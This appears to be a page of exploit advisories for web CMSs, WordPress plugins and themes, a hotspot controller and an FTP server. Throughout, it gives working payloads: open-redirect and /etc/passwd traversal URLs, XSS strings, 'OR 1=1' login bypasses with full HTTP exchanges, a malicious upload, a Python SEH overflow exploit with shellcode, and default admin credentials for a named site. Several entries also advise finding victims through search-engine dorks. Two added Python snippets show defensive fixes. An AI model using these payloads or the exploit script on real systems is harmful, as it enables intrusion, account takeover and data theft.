<pre><code>====================================================================================================================================<br />| # Title : WordPress Page Builder KingComposer 2.9.5 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://kingcomposer.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562 | <br />| # Dork : "/wp-content/themes/churchope/lib/" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS-Bank Mellat Payment Manager v1.0.0 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.2 (64 bits) | <br />| # Vendor : https://github.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine. <br /><br />[+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code <br /> (usually in the form of Javascript) to another user. <br /> Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context <br /> allowing the attacker to access any cookies or session tokens retained by the browser. <br /> <br />[+] Affected items : <br /> <br /> /bank/default.php <br /> /bank/index.php <br /> <br />[+] The impact of this vulnerability :<br /><br /> Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data <br /> from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify <br /> the content of the page presented to the user. <br /><br />[+] How to fix this vulnerability :<br /><br /> Your script should filter metacharacters from user input.<br /> Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code <br /> (usually in the form of Javascript) to another user. 
Because a browser cannot know if the script should be trusted or not,<br /> it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. <br /><br />[+] Attack details :<br /><br /> URL encoded POST input PayAdditionalData was set to 01/01/1967" onmouseover=prompt(940051) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /> URL encoded POST input PayAmount was set to 1" onmouseover=prompt(911818) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /> URL encoded POST input pay_from was set to 1" onmouseover=prompt(965239) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /> URL encoded POST input pay_from1 was set to 1" onmouseover=prompt(951829) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /> <br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | <br />=======================================================================================================================================<br /><br /></code></pre>
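<p>The reflection context reported above ("inside a tag parameter between double quotes"), as an added example that is not part of the original advisory: a Python regression check that renders a form field with and without attribute encoding, then parses the markup to see whether the reported PayAmount value creates new attributes. The input markup and all function names are assumptions, since the application's template is not shown on the page.</p>

```python
from html import escape
from html.parser import HTMLParser

# Value the advisory reports for the PayAmount POST field.
REPORTED_VALUE = '1" onmouseover=prompt(911818) bad="'


def render_unsafe(name, value):
    """Reflects the value verbatim inside a double-quoted attribute."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_encoded(name, value):
    """Attribute-encodes the value; quote=True also encodes " and '."""
    return (f'<input type="text" name="{escape(name, quote=True)}" '
            f'value="{escape(value, quote=True)}">')


class _InputAttrs(HTMLParser):
    """Collects the attributes of the last <input> tag seen."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attributes(markup):
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_attributes(markup, expected=("type", "name", "value")):
    """Attribute names present in the parsed tag that the template never wrote."""
    return sorted(set(parsed_attributes(markup)) - set(expected))


if __name__ == "__main__":
    for render in (render_unsafe, render_encoded):
        html = render("PayAmount", REPORTED_VALUE)
        print(render.__name__, "->", injected_attributes(html))
```

<p>With encoding applied, the parser hands back the whole submitted string as the value attribute, so the field still round-trips the user's input without gaining an event handler.</p>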
<pre><code># Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)<br /># Date: 18/07/2023<br /># Exploit Author: Andre Nogueira<br /># Vendor Homepage: https://www.raidenftpd.com/en/<br /># Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe<br /># Version: RaidenFTPD 2.4.4005<br /># Tested on: Microsoft Windows 10 Build 19045<br /><br /># 1.- Open RaidenFTPD<br /># 2.- Click on 'Setup' -> 'Step by step setup wizard'<br /># 3.- Run python code: exploit-raidenftpd.py<br /># 4.- Paste the content of exploit-raiden.txt into the field 'Server name'<br /># 5.- Click 'next' -> 'next' -> 'ok'<br /># 6.- Pop calc.exe<br /><br /><br />#!/usr/bin/env python3<br />from struct import pack<br /><br />crash = 2000<br />offset = 497<br /><br /># msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" <br />shellcode = b"\x90" * 8<br />shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"<br />shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"<br />shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"<br />shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"<br />shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"<br />shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"<br />shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"<br />shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"<br />shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"<br />shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"<br />shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"<br />shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"<br />shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"<br />shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"<br />shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"<br />shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"<br />shellcode += 
b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"<br />shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"<br />shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"<br />shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"<br /><br />nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes<br />SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll<br /><br />buffer = b"A" * offset<br />buffer += nSEH<br />buffer += SEH<br />buffer += shellcode<br />buffer += b"D" * (crash -len(buffer))<br /><br />file_payload = open("exploit-raiden.txt", 'wb')<br />print("[*] Creating the .txt file for out payload")<br />file_payload.write(buffer)<br />print("[*] Writing malicious payload to the .txt file")<br />file_payload.close()<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS TSS-EST V1.0.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : https://p30vel.ir/ |<br />| # Dork : Powered by: TSS-EST.COM |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use Payload : user & pass : ADMIN' OR 1=1#<br /><br />[+] http://127.0.0.1/tishreen-uhledusy/cms/ <br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Foody Friend 1.0 - Arbitrary File Upload<br /># Exploit Author: CraCkEr<br /># Date: 12/07/2023<br /># Vendor: Bug Finder<br /># Vendor Homepage: https://bugfinder.net/<br /># Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25<br /># Tested on: Windows 10 Pro<br /># Impact: Allows User to upload files to the web server<br /><br /><br /><br />## Description<br /><br />Allows Attacker to upload malicious files onto the server, such as Stored XSS<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as [Normal User]<br />2. In [User Dashboard] go to [Edit profile]<br />3. Choose profile picture & Upload any Image & Click on [Save Changes]<br />4. Catch the POST Request with [Burp Proxy Intercept]<br />5. Inject your [Stored XSS]<br /> <br />POST /user/profile HTTP/2<br /><br />-----------------------------------------------------------<br />Content-Disposition: form-data; name="profile_picture"; filename="XSS.png"<br />Content-Type: image/png<br /><br /><script>alert(1)</script><br />-----------------------------------------------------------<br /><br />6. Send the Request<br />7. Right Click on Your Profile Picture [Copy the Path of the Image]<br />8. Access your Uploaded Evil file on this Path: https://website/assets/upload/userProfile/[Stored-XSS]<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS Supported IRF-TH v2.0.6 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.euroyouth.org.ua | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine <br /><br />[+] Use payload in search box : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/euroyouthorgua/en/search.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection<br /># Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"<br /># Date: 07/2023<br /># Exploit Author: Ansh Jain @sudoark<br /># Author Contact : arkinux01@gmail.com<br /># Vendor Homepage: https://www.wifi-soft.com/<br /># Software Link:<br />https://www.wifi-soft.com/products/unibox-hotspot-controller.php<br /># Version: Unibox Administration 3.0 & 3.1<br /># Tested on: Microsoft Windows 11<br /># CVE : CVE-2023-34635<br /># CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635<br /><br />The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to<br />SQL Injection, which can lead to unauthorised admin access for attackers.<br />The vulnerability occurs because of not validating or sanitising the user<br />input in the username field of the login page and directly sending the<br />input to the backend server and database.<br /><br />## How to Reproduce<br />Step 1 : Visit the login page and check the version, whether it is 3.0,<br />3.1, or not.<br />Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and<br />enter any random password.<br />Step 3 : Fill in the captcha and hit login. 
After hitting login, you have<br />been successfully logged in as an administrator and can see anyone's user<br />data, modify data, revoke access, etc.<br /><br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Login Request<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Parameters: username, password, captcha, action<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /index.php HTTP/2<br />Host: 255.255.255.255.host.com<br />Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 83<br />Origin: https://255.255.255.255.host.com<br />Referer: https://255.255.255.255.host.com/index.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login<br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Login Response<br 
/>--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/2 302 Found<br />Server: nginx<br />Date: Tue, 18 Jul 2023 13:32:14 GMT<br />Content-Type: text/html; charset=UTF-8<br />Location: ./dashboard/dashboard<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Successful Loggedin Request<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />GET /dashboard/dashboard HTTP/2<br />Host: 255.255.255.255.host.com<br />Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://255.255.255.255.host.com/index.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />### Successful Loggedin Response<br />--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/2 200 OK<br 
/>Server: nginx<br />Date: Tue, 18 Jul 2023 13:32:43 GMT<br />Content-Type: text/html; charset=UTF-8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Cache_control: private<br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br />html content<br /></html><br /><br /></code></pre>
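<p>The root cause the advisory names (username input sent to the database without validation), as an added example that is not the vendor's or the author's code: a login query built by string concatenation beside a parameterized one, run against an in-memory SQLite table with the username value from Step 2. The table layout, function names and sample credentials are constructed assumptions; the product's real schema and query are not shown on the page.</p>

```python
import hashlib
import hmac
import os
import sqlite3

# Username value taken from the advisory's Step 2.
PAYLOAD = "'or 1=1 limit 1-- -"


def _legacy_hash(password):
    # Unsalted hash compared inside the SQL text (assumed legacy design).
    return hashlib.sha256(password.encode()).hexdigest()


def _kdf(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """Constructed two-user table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, role TEXT, "
               "legacy_hash TEXT, salt BLOB, pw_hash BLOB)")
    for name, role, pw in [("admin", "administrator", "constructed-admin-pw"),
                           ("guest", "user", "constructed-guest-pw")]:
        salt = os.urandom(16)
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                   (name, role, _legacy_hash(pw), salt, _kdf(pw, salt)))
    return db


def login_concatenated(db, username, password):
    """Vulnerable: the username becomes part of the SQL statement."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND legacy_hash = '" + _legacy_hash(password) + "'")
    return db.execute(sql).fetchone()


def login_parameterized(db, username, password):
    """Hardened: bound parameter, password verified outside the query."""
    row = db.execute("SELECT username, role, salt, pw_hash FROM users "
                     "WHERE username = ?", (username,)).fetchone()
    if row is None:
        _kdf(password, b"\x00" * 16)  # keep timing similar for unknown users
        return None
    if not hmac.compare_digest(_kdf(password, row[2]), row[3]):
        return None
    return row[0], row[1]
```

<p>Because the bound parameter is compared as data, the Step 2 string is treated as a username that does not exist, and the password check no longer lives in SQL text that input can comment out.</p>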
<pre><code>=========================================================================================<br />| # Title : CMS SAUDI SOFTECH v5.0.2 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.saudisoftech.com/ | <br />| # Dork : intext:"DESIGNED BY: SAUDI SOFTECH (MST)" |<br />=========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine <br /><br />[+] Login : /panel/<br /><br />[+] http://127.0.0.1/ihabeccom/page.php?id=48 <==== inject here<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS NEXIN engine v2.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://www.composeit.hu/ | <br />| # Dork : NEXIN engine v2.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] appears to leave a default administrative account in place post installation.<br /><br />[+] Panel : http://wlugashotelcom/admin/<br /><br />[+] User : root & pass : job314<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>